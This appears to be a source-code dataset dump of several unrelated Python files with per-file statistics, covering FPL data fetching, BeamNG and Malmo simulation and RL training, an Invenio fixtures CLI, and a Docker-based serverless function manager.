seqd = SingleEdgeQueryDispatcher(input_cls='Gene',
output_cls='ChemicalSubstance',
input_id='NCBIGene',
values='1017')
seqd.query()
newG = filter_node_degree(seqd.G, count)
self.assertEqual(len(newG.nodes), len(seqd.G.nodes))
# test for correct ordering of ranks
def test_ranks(self):
seqd = SingleEdgeQueryDispatcher(input_cls='Disease',
input_id='MONDO',
output_cls='PhenotypicFeature',
pred='related_to',
values='MONDO:0010997')
seqd.query()
newG = filter_node_degree(seqd.G)
for i1,node1 in enumerate(newG.nodes):
if node1 == 'MONDO:MONDO:0010997':
continue
for i2,node2 in enumerate(newG.nodes):
if node2 == 'MONDO:MONDO:0010997':
continue
if newG.degree(node1) > newG.degree(node2):
self.assertLess(newG.nodes.data()[node1]['rank'], newG.nodes.data()[node2]['rank'])
elif newG.degree(node1) < newG.degree(node2):
self.assertGreater(newG.nodes.data()[node1]['rank'], newG.nodes.data()[node2]['rank'])
if __name__ == '__main__':
unittest.main()
| 40.754386
| 106
| 0.54025
| 233
| 2,323
| 5.23176
| 0.351931
| 0.059065
| 0.052502
| 0.091058
| 0.45119
| 0.415094
| 0.415094
| 0.359311
| 0.331419
| 0.331419
| 0
| 0.039624
| 0.359019
| 2,323
| 56
| 107
| 41.482143
| 0.779046
| 0.061989
| 0
| 0.340909
| 0
| 0
| 0.082988
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.068182
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b54ed986a0849287fd62118ba89a87ae8732ba9e
| 974
|
py
|
Python
|
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | 1
|
2018-08-15T02:52:52.000Z
|
2018-08-15T02:52:52.000Z
|
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | null | null | null |
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | null | null | null |
"""
Retrieves data as json files from fantasy.premierleague.com
"""
import json
import requests
LAST_SEASON_DATA_FILENAME = "data/player_data_20_21.json"
DATA_URL = "https://fantasy.premierleague.com/api/bootstrap-static/"
DATA_FILENAME = "data/player_data_21_22.json"
FIXTURES_URL = "https://fantasy.premierleague.com/api/fixtures/"
FIXTURES_FILENAME = "data/fixtures_data_21_22.json"
# Download all player data and write file
def get_player_data(use_last_season):
if use_last_season:
return LAST_SEASON_DATA_FILENAME
r = requests.get(DATA_URL)
json_response = r.json()
with open(DATA_FILENAME, 'w') as out_file:
json.dump(json_response, out_file)
return DATA_FILENAME
# Download all fixtures data and write file
def get_fixtures_data():
r = requests.get(FIXTURES_URL)
json_response = r.json()
with open(FIXTURES_FILENAME, 'w') as out_file:
json.dump(json_response, out_file)
return FIXTURES_FILENAME
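# Illustrative usage (not part of the original file):
#   players_file = get_player_data(use_last_season=False)   # downloads fresh data
#   fixtures_file = get_fixtures_data()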
| 24.974359
| 68
| 0.74846
| 142
| 974
| 4.84507
| 0.288732
| 0.087209
| 0.100291
| 0.063953
| 0.468023
| 0.392442
| 0.229651
| 0.148256
| 0.148256
| 0.148256
| 0
| 0.014634
| 0.158111
| 974
| 38
| 69
| 25.631579
| 0.82439
| 0.145791
| 0
| 0.190476
| 0
| 0
| 0.227218
| 0.100851
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.095238
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b54f720607fa63d495bc79cd36045e62028217a1
| 5,587
|
py
|
Python
|
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | 1
|
2021-08-10T19:29:52.000Z
|
2021-08-10T19:29:52.000Z
|
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | null | null | null |
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | null | null | null |
from beamngpy import BeamNGpy, Vehicle, Scenario, ScenarioObject
from beamngpy import setup_logging, Config
from beamngpy.sensors import Camera, GForces, Lidar, Electrics, Damage, Timer
import beamngpy
import time, random
# globals
default_model = 'pickup'
default_scenario = 'west_coast_usa' #'cliff' # smallgrid
dt = 20
def spawn_point(scenario_locale):
if scenario_locale == 'cliff':  # '==', not 'is': identity checks on strings are unreliable
#return {'pos':(-124.806, 142.554, 465.489), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
return {'pos': (-124.806, 190.554, 465.489), 'rot': None, 'rot_quat': (0, 0, 0.3826834, 0.9238795)}
elif scenario_locale == 'west_coast_usa':
#return {'pos':(-717.121, 101, 118.675), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
return {'pos': (-717.121, 101, 118.675), 'rot': None, 'rot_quat': (0, 0, 0.918812, -0.394696)}
#906, 118.78 rot:
elif scenario_locale == 'smallgrid':
return {'pos':(0.0, 0.0, 0.0), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
def setup_sensors(vehicle):
# Set up sensors
pos = (-0.3, 1, 1.0)
direction = (0, 1, 0)
fov = 120
resolution = (512, 512)
front_camera = Camera(pos, direction, fov, resolution,
colour=True, depth=True, annotation=True)
pos = (0.0, 3, 1.0)
direction = (0, -1, 0)
fov = 90
resolution = (512, 512)
back_camera = Camera(pos, direction, fov, resolution,
colour=True, depth=True, annotation=True)
gforces = GForces()
electrics = Electrics()
damage = Damage()
damage.encode_vehicle_request()
lidar = Lidar(visualized=False)
timer = Timer()
# Attach them
vehicle.attach_sensor('front_cam', front_camera)
vehicle.attach_sensor('back_cam', back_camera)
vehicle.attach_sensor('gforces', gforces)
vehicle.attach_sensor('electrics', electrics)
vehicle.attach_sensor('damage', damage)
vehicle.attach_sensor('timer', timer)
return vehicle
def compare_damage(d1, d2):
for key in d1['damage']:
if d1['damage'][key] != d2['damage'][key]:
print("d1['damage'][{}] == {}; d2['damage'][{}] == {}".format(key, d1['damage'][key], key, d2['damage'][key]))
try:
# handle specific keys
if key == 'deform_group_damage' or key == 'part_damage':
for k in d1['damage'][key].keys():
print("\td1['damage'][{}][{}] == {}; d2['damage'][{}][{}] == {}".format(key, k, d1['damage'][key][k], key, k,
d2['damage'][key][k]))
else:
if d1['damage'][key] < d2['damage'][key]:
print("\td2[damage][{}] is greater".format(key))
else:
print("\td1[damage][{}] is greater".format(key))
except:
continue
print()
return
def backup(cum_list, sec):
#return "1_24"
dt = sec * 5.0
index = len(cum_list) - int(dt)
if index < 0:
index = 0
elif index >= len(cum_list):
index = len(cum_list) -1
print("cum_list={}".format(cum_list))
print("index={}".format(index))
#try:
return cum_list[index]
#except:
#return "0_0"
def main():
global default_model, default_scenario
beamng = BeamNGpy('localhost', 64256, home='C:/Users/merie/Documents/BeamNG.research.v1.7.0.1')
#scenario = Scenario('smallgrid', 'spawn_objects_example')
scenario = Scenario(default_scenario, 'research_test', description='Random driving for research')
vehicle = Vehicle('ego_vehicle', model=default_model, licence='PYTHON')
vehicle = setup_sensors(vehicle)
spawn = spawn_point(default_scenario)
scenario.add_vehicle(vehicle, pos=spawn['pos'], rot=spawn['rot'], rot_quat=spawn['rot_quat'])
scenario.make(beamng)
bng = beamng.open()
bng.load_scenario(scenario)
bng.start_scenario()
vehicle.update_vehicle()
d1 = bng.poll_sensors(vehicle)
cum_list = []
bound = 0.0
for i in range(3):
for _ in range(45):
bound = bound + 0.0 # 0.1
# vehicle.save()
vehicle.update_vehicle()
d2 = bng.poll_sensors(vehicle)
throttle = 1.0
#throttle = random.uniform(0.0, 1.0)
steering = random.uniform(-1 * bound, bound)
brake = 0.0 #random.choice([0, 0, 0, 1])
vehicle.control(throttle=throttle, steering=steering, brake=brake)
pointName = "{}_{}".format(i, _)
cum_list.append(pointName)
vehicle.saveRecoveryPoint(pointName)
bng.step(20)
print("SEGMENT #{}: COMPARE DAMAGE".format(i))
damage_diff = compare_damage(d1, d2)
d1 = d2
# "Back up" 1 second -- load vehicle at that time in that position.
backup_pointName = backup(cum_list, 0.001)
print('recovering to {}'.format(backup_pointName))
loadfile = vehicle.loadRecoveryPoint(backup_pointName)
print('loadfile is {}'.format(loadfile))
bng.pause()
vehicle.update_vehicle()
vehicle.load(loadfile)
#vehicle.load("vehicles/pickup/vehicle.save.json")
bng.resume()
#vehicle.startRecovering()
#time.sleep(1.5)
#vehicle.stopRecovering()
vehicle.update_vehicle()
bng.pause()
time.sleep(2)
# vehicle.load("vehicles/pickup/vehicle.save.json")
bng.resume()
bng.close()
if __name__ == "__main__":
main()
| 36.51634
| 133
| 0.583139
| 685
| 5,587
| 4.632117
| 0.264234
| 0.015128
| 0.0104
| 0.022061
| 0.211787
| 0.173338
| 0.173338
| 0.162622
| 0.144343
| 0.113457
| 0
| 0.067558
| 0.263469
| 5,587
| 153
| 134
| 36.51634
| 0.703524
| 0.121711
| 0
| 0.12069
| 0
| 0
| 0.122466
| 0.01454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043103
| false
| 0
| 0.043103
| 0
| 0.137931
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5526b9490a6617e9343309ab67db978943793e5
| 1,070
|
py
|
Python
|
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
import pickle
def remove_duplicate_from_list(data):
""" remove duplications from specific list
any data can be contained in the data.
if the data is hashable, you can implement this function easily like below.
data = list(set(data))
but if the data is unhashable, you have to take another approach.
This function uses pickle.dumps to convert each element to bytes.
Bytes are hashable, so the set-based deduplication then works just as it does for hashable data.
Arguments:
data {list(any)} -- list that contains any type of data
Returns:
{list(any)} -- list that contains any type of data without duplications
"""
pickled_data = [pickle.dumps(d) for d in data]
removed_pickled_data = list(set(pickled_data))
result = [pickle.loads(d) for d in removed_pickled_data]
return result
if __name__ == "__main__":
data = [1, 2, 2, 3, 2, 2, 2, 6]
print(remove_duplicate_from_list(data))
data = ["hoge", 1, "hdf", 3.4, "hoge", 2, 2, 2]
print(remove_duplicate_from_list(data))
| 36.896552
| 89
| 0.66729
| 161
| 1,070
| 4.291925
| 0.403727
| 0.014472
| 0.082489
| 0.099855
| 0.23589
| 0.196816
| 0.104197
| 0.104197
| 0.104197
| 0
| 0
| 0.017305
| 0.243925
| 1,070
| 28
| 90
| 38.214286
| 0.836836
| 0.534579
| 0
| 0.181818
| 0
| 0
| 0.042601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.272727
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5533e6640dc60d29a04f82e1a7722aa55036807
| 7,226
|
py
|
Python
|
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | 1
|
2022-02-08T18:28:30.000Z
|
2022-02-08T18:28:30.000Z
|
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | null | null | null |
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2022 NYU Libraries.
#
# ultraviolet-cli is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module for custom UltraViolet commands."""
import click
import glob
import json
import os
import requests
import sys
from jsonschema import Draft4Validator
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from .. import config, utils
# Suppress InsecureRequestWarning warnings from urllib3.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def create_record_draft(metadata, api, token):
sleep(1)
try:
r = requests.get(api, timeout=5, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Couldn\'t connect to api at {api}. Is the application running?')
raise SystemExit(e)
headers = {
'content-type': 'application/json',
'authorization': f'Bearer {token}'
}
response = requests.post(url=api,
data=json.dumps(metadata),
headers=headers,
verify=False)
response.raise_for_status()
return response.json()
def delete_record_draft(pid, api, token):
sleep(1)
url = '/'.join((api.strip('/'), pid, 'draft'))
try:
r = requests.get(api, timeout=5, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Couldn\'t connect to api at {api}. Is the application running?')
raise SystemExit(e)
headers = {
'authorization': f'Bearer {token}'
}
    try:
        response = requests.delete(url=url, headers=headers, verify=False)
        return response
    except requests.exceptions.RequestException:
        print(f'Unable to delete draft with pid {pid}')
def publish_record(record_metadata, access_token):
sleep(1)
url = record_metadata['links']['publish']
headers = {
'authorization': f'Bearer {access_token}'
}
response = requests.post(url=url,
headers=headers,
verify=False)
return response.json()
@click.group()
def fixtures():
"""
An entry point for fixtures subcommands, e.g., ingest, purge
"""
pass
@fixtures.command()
@click.option('-a', '--api', required=True, type=str,
default=config.DEFAULT_RECORDS_API_URL,
help=f'Invenio REST API base URL. Default={config.DEFAULT_RECORDS_API_URL}')
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-o', '--output', required=True, type=str,
default=config.DEFAULT_FIXTURES_OUTFILE,
help='Where new fixture pid mappings will be written')
@click.option('-t', '--token', help='REST API token')
def ingest(api, dir, output, token):
"""
Post local dir of UV fixture draft records via REST API.
"""
click.secho('REST API: ', nl=False, bold=True, fg='green')
click.secho(api)
click.secho('Fixtures directory: ', nl=False, bold=True, fg='green')
click.secho(dir)
if token is None:
token = utils.token_from_user(email=config.DEFAULT_FIXTURES_USER, name='default-su-token')
click.secho('Auth Token: ', nl=False, bold=True, fg='green')
click.secho(token)
records = glob.glob(f'{dir}/**/*.json', recursive=True)
click.secho(f'\nFound {len(records)} records', nl=True, bold=True, fg='blue')
results = json.loads(open(output).read()) if os.path.exists(output) else {}
for file in records:
click.secho(f'Posting record from {file}', nl=True, fg='blue')
        record = json.loads(open(file).read())
        draft = create_record_draft(record, api, token)
uv_id = os.path.dirname(file).split('/')[-1]
results[draft['id']] = uv_id
os.makedirs(os.path.dirname(output), exist_ok=True)
with open(output, "w") as f:
json.dump(results, f)
# record = publish_record(draft, token)
@fixtures.command()
@click.option('-a', '--api', required=True, type=str,
default=config.DEFAULT_RECORDS_API_URL,
help=f'Invenio REST API base URL. Default={config.DEFAULT_RECORDS_API_URL}')
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-o', '--output', required=True, type=str,
default=config.DEFAULT_FIXTURES_OUTFILE,
help='Where new fixture pid mappings will be written')
@click.option('-t', '--token', help='REST API token')
def purge(api, dir, output, token):
"""
Delete all UV fixture draft records via REST API.
"""
click.secho('REST API: ', nl=False, bold=True, fg='green')
click.secho(api)
if token is None:
token = utils.token_from_user(email=config.DEFAULT_FIXTURES_USER, name='default-su-token')
click.secho('Auth Token: ', nl=False, bold=True, fg='green')
click.secho(token)
results = json.loads(open(output).read()) if os.path.exists(output) else {}
for pid, uv_id in results.copy().items():
res = delete_record_draft(pid, api, token)
if res.ok:
            click.secho(f'Deleting draft record {uv_id} aka {pid}', nl=True, bold=True, fg='blue')
results.pop(pid)
os.makedirs(os.path.dirname(output), exist_ok=True)
with open(output, "w") as f:
json.dump(results, f)
@fixtures.command()
@click.option('-d', '--dir', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_FIXTURES_DIR, help=f'Path to directory of fixtures. Default={config.DEFAULT_FIXTURES_DIR}')
@click.option('-s', '--schema-file', required=True,
type=click.Path(exists=True),
default=config.DEFAULT_SCHEMA_PATH, help=f'Path to json schema. Default={config.DEFAULT_SCHEMA_PATH}')
def validate(dir, schema_file):
"""
Validate local dir of fixture records against JSON schema.
"""
click.secho('Fixtures directory: ', nl=False, bold=True, fg='green')
click.secho(dir)
click.secho('JSON Schema: ', nl=False, bold=True, fg='green')
click.secho(schema_file)
records = glob.glob(f'{dir}/**/*.json', recursive=True)
click.secho(f'\nFound {len(records)} records', nl=True, bold=True, fg='blue')
schema = json.loads(open(schema_file).read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema, format_checker=None)
for file in records:
        record = json.loads(open(file).read())
        try:
            validator.validate(record)
click.secho(f'{file} passes', nl=True, fg='blue')
        except Exception as error:
click.secho(f'{file} fails', nl=True, fg='red')
print('An exception occurred: {}'.format(error))
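# --- Added usage note (not in the original file): typical invocations, assuming
# this click group is wired up as a `fixtures` CLI entry point; the flags mirror
# the options declared above.
#   fixtures ingest   -d data/fixtures -o out/pids.json -t <token>
#   fixtures purge    -o out/pids.json -t <token>
#   fixtures validate -d data/fixtures -s schema.json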
| 33.146789
| 128
| 0.63313
| 932
| 7,226
| 4.831545
| 0.216738
| 0.044415
| 0.062181
| 0.049745
| 0.617366
| 0.596713
| 0.573173
| 0.567177
| 0.540084
| 0.540084
| 0
| 0.003049
| 0.22848
| 7,226
| 217
| 129
| 33.299539
| 0.804664
| 0.07902
| 0
| 0.608392
| 0
| 0
| 0.180188
| 0.034488
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048951
| false
| 0.013986
| 0.06993
| 0
| 0.132867
| 0.027972
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55d244aa62443aced945674009694fb76ee238b
| 1,834
|
py
|
Python
|
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | 24
|
2021-12-02T01:00:54.000Z
|
2022-03-27T00:50:28.000Z
|
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | null | null | null |
src/function_manager/function_manager.py
|
lzjzx1122/FaaSFlow
|
c4a32a04797770c21fe6a0dcacd85ac27a3d29ec
|
[
"Apache-2.0"
] | 3
|
2021-12-02T01:00:47.000Z
|
2022-03-04T07:33:09.000Z
|
import gevent
import docker
import os
from function_info import parse
from port_controller import PortController
from function import Function
import random
repack_clean_interval = 5.000 # repack and clean every 5 seconds
dispatch_interval = 0.005 # 200 qps at most
# The class that schedules each function's periodic operations: container repack/clean and request dispatch
class FunctionManager:
def __init__(self, config_path, min_port):
self.function_info = parse(config_path)
self.port_controller = PortController(min_port, min_port + 4999)
self.client = docker.from_env()
self.functions = {
x.function_name: Function(self.client, x, self.port_controller)
for x in self.function_info
}
self.init()
def init(self):
print("Clearing previous containers.")
os.system('docker rm -f $(docker ps -aq --filter label=workflow)')
gevent.spawn_later(repack_clean_interval, self._clean_loop)
gevent.spawn_later(dispatch_interval, self._dispatch_loop)
def _clean_loop(self):
gevent.spawn_later(repack_clean_interval, self._clean_loop)
for function in self.functions.values():
gevent.spawn(function.repack_and_clean)
def _dispatch_loop(self):
gevent.spawn_later(dispatch_interval, self._dispatch_loop)
for function in self.functions.values():
gevent.spawn(function.dispatch_request)
def run(self, function_name, request_id, runtime, input, output, to, keys):
# print('run', function_name, request_id, runtime, input, output, to, keys)
if function_name not in self.functions:
raise Exception("No such function!")
return self.functions[function_name].send_request(request_id, runtime, input, output, to, keys)
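# --- Added sketch (not in the original file): how a caller presumably wires this
# up. The config path and port base are hypothetical; running this for real needs
# a Docker daemon, the repo's function_info config format, and gevent monkey-patching.
# manager = FunctionManager('config/functions.yml', min_port=20000)
# manager.run('func_a', request_id='r1', runtime=..., input=..., output=..., to=..., keys=...)
# gevent.wait()  # keep the _clean_loop/_dispatch_loop greenlets alive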
| 37.428571
| 104
| 0.681025
| 229
| 1,834
| 5.222707
| 0.344978
| 0.055184
| 0.053512
| 0.052676
| 0.36204
| 0.348662
| 0.348662
| 0.32107
| 0.244147
| 0.091973
| 0
| 0.011429
| 0.236641
| 1,834
| 48
| 105
| 38.208333
| 0.842857
| 0.09542
| 0
| 0.166667
| 0
| 0
| 0.061644
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.138889
| false
| 0
| 0.194444
| 0
| 0.388889
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55f0ffd6458d9da1434363a2f94293d840e899b
| 6,717
|
py
|
Python
|
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | 1
|
2022-02-17T07:58:06.000Z
|
2022-02-17T07:58:06.000Z
|
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | null | null | null |
MalmoEnv/run.py
|
chemgymrl/malmo
|
207e2530ec94af46450ba6d0e62d691ade91e282
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------------------------
# Copyright (c) 2018 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import os
import numpy as np
import matplotlib.pyplot as plt
import malmoenv
import argparse
from pathlib import Path
import time
from PIL import Image
from stable_baselines3.common import results_plotter
from stable_baselines3.common.monitor import Monitor
from stable_baselines3.common.results_plotter import load_results, ts2xy, plot_results
from stable_baselines3.common.noise import NormalActionNoise
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import PPO
class SaveOnBestTrainingRewardCallback(BaseCallback):
"""
Callback for saving a model (the check is done every ``check_freq`` steps)
based on the training reward (in practice, we recommend using ``EvalCallback``).
:param check_freq:
:param log_dir: Path to the folder where the model will be saved.
It must contains the file created by the ``Monitor`` wrapper.
:param verbose: Verbosity level.
"""
def __init__(self, check_freq: int, log_dir: str, verbose: int = 1):
super(SaveOnBestTrainingRewardCallback, self).__init__(verbose)
self.check_freq = check_freq
self.log_dir = log_dir
self.save_path = os.path.join(log_dir, 'best_model')
self.best_mean_reward = -np.inf
# def _init_callback(self) -> None:
# # # Create folder if needed
# # if self.save_path is not None:
# # os.makedirs(self.save_path, exist_ok=True)
def _on_step(self) -> bool:
if self.n_calls % self.check_freq == 0:
# Retrieve training reward
x, y = ts2xy(load_results(self.log_dir), 'timesteps')
if len(x) > 0:
# Mean training reward over the last 100 episodes
mean_reward = np.mean(y[-100:])
if self.verbose > 0:
print(f"Num timesteps: {self.num_timesteps}")
print(f"Best mean reward: {self.best_mean_reward:.2f} - Last mean reward per episode: {mean_reward:.2f}")
# New best model, you could save the agent here
if mean_reward > self.best_mean_reward:
self.best_mean_reward = mean_reward
# Example for saving best model
if self.verbose > 0:
print(f"Saving new best model to {self.save_path}")
self.model.save(self.save_path)
return True
log_dir = "tmp/"
os.makedirs(log_dir, exist_ok=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='malmovnv test')
parser.add_argument('--mission', type=str, default='missions/jumping.xml', help='the mission xml')
parser.add_argument('--port', type=int, default=9000, help='the mission server port')
parser.add_argument('--server', type=str, default='127.0.0.1', help='the mission server DNS or IP address')
parser.add_argument('--port2', type=int, default=None, help="(Multi-agent) role N's mission port. Defaults to server port.")
parser.add_argument('--server2', type=str, default=None, help="(Multi-agent) role N's server DNS or IP")
parser.add_argument('--episodes', type=int, default=100, help='the number of resets to perform - default is 1')
parser.add_argument('--episode', type=int, default=0, help='the start episode - default is 0')
parser.add_argument('--role', type=int, default=0, help='the agent role - defaults to 0')
parser.add_argument('--episodemaxsteps', type=int, default=100, help='max number of steps per episode')
parser.add_argument('--saveimagesteps', type=int, default=0, help='save an image every N steps')
parser.add_argument('--resync', type=int, default=0, help='exit and re-sync every N resets'
' - default is 0 meaning never.')
parser.add_argument('--experimentUniqueId', type=str, default='test1', help="the experiment's unique id.")
args = parser.parse_args()
if args.server2 is None:
args.server2 = args.server
xml = Path(args.mission).read_text()
env = malmoenv.make()
env.init(xml, args.port,
server=args.server,
server2=args.server2, port2=args.port2,
role=args.role,
exp_uid=args.experimentUniqueId,
episode=args.episode, resync=args.resync)
env = Monitor(env, log_dir)
# print("checking env")
check_env(env, True)
s = SaveOnBestTrainingRewardCallback(2000, log_dir)
# print("checked env")
model = PPO("MlpPolicy", env, verbose=1, tensorboard_log="./ppo_test_tensorboard/")
#model.load("tmp/best_model.zip")
model.learn(total_timesteps=100000, callback=s, reset_num_timesteps=False)
# print("trained and saved model")
# for i in range(args.episodes):
# print("reset " + str(i))
# obs = env.reset()
# steps = 0
# done = False
# while not done and (args.episodemaxsteps <= 0 or steps < args.episodemaxsteps):
# # h, w, d = env.observation_space.shape
# # print(done)
# action, _states = model.predict(obs, deterministic=True)
# # action = env.action_space.sample()
# obs, reward, done, info = env.step(action)
# steps += 1
# # print("reward: " + str(reward))
# # print(obs)
# time.sleep(.05)
env.close()
| 46.645833
| 128
| 0.650737
| 879
| 6,717
| 4.861206
| 0.333333
| 0.025275
| 0.047742
| 0.036508
| 0.083782
| 0.052422
| 0.029487
| 0.01451
| 0
| 0
| 0
| 0.01434
| 0.221379
| 6,717
| 143
| 129
| 46.972028
| 0.802677
| 0.37755
| 0
| 0.028571
| 0
| 0.014286
| 0.203812
| 0.012219
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.214286
| 0
| 0.271429
| 0.042857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b55f2629add10c43d98efae9012f1f13e3691bd5
| 1,172
|
py
|
Python
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 62
|
2018-11-30T05:53:32.000Z
|
2022-03-20T13:15:22.000Z
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 25
|
2019-08-12T18:53:41.000Z
|
2021-12-28T10:17:39.000Z
|
example/wrapper/common/5001-get_tgpio_digital.py
|
krasin/xArm-Python-SDK-ssh
|
9c854e8bfa78d0e91b67efbab79f733ddf19e916
|
[
"BSD-3-Clause"
] | 43
|
